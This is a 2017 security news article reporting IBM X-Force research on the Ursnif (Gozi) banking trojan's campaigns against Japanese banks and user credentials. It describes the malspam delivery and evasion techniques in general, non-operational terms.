Ursnif Banking Trojan Targeted Japan

As confirmed by the IBM X-Force data on the functionality of financial malware practiced by cybercrime groups, the Ursnif, also known as Gozi, the highly active malware code in the 2016's financial sector is Banking Trojan. Even in 2017, the Trojan has maintained its superiority.

The activity of Ursnifis marked by campaign activity and frequent code alterations in Europe, Australia, and America. But one its prominent targets in 2017 is the Japanese banks, where the operators of Ursnif were highly active in the late Q3 2017, instigating in September. The actors of the threat continue to spam the users in the area regularly moving into Q4.

Japan along with Australia, Europe, and America has been targeted by Ursnif or Gozi for numerous years. But as per the report disclosed by IBM X-Force analyzing the malware, hackers have moved up Ursnif campaigns in Japan including new evasion methods and targets.

As indicated by the current samples, criminal groups are targeting not just banks, but even banking credentials. As stated by Limor Kessem, the IBM's executive security advisor and the report's author, "Besides banks, the variant of active Ursnif in Japan is targeting the credentials of users for cloud storage, local webmail, e-commerce sites, and crypto currency exchange platforms," as posted on 26th October 2017 on threatpost.com.

In its current campaigns in Japan, Ursnif has been exploiting mal spam that includes emails with fake attachments intended to belong to financial services and providers of payment cards in Japan. Another variant of mal spam delivers an HTML link triggering a download of .zip file including a JavaScript. There has been a Power Shell launched from the script fetching the Ursnif payload.

Ursnifhas used other methods of evasion including the use of the Tor network for hiding command and control communications. In July, there was another anti-sandboxing technique detected by Forcepoint that was used by Ursnif that combated the mouse movements indicating the research environment. If there was a sandbox environment identified, there were no payloads delivered by the booby-trapped attachments.

As noted by the IBM X-Force regarding Ursnif, it has been one of the most powerful active banking Trojans in Japan in the past five years. Our scientists have also been tracking the third version of Ursnif targeting banks in Australia. To know more about the information, you need to stay tuned with us.

» SPAMfighter News - 11/2/2017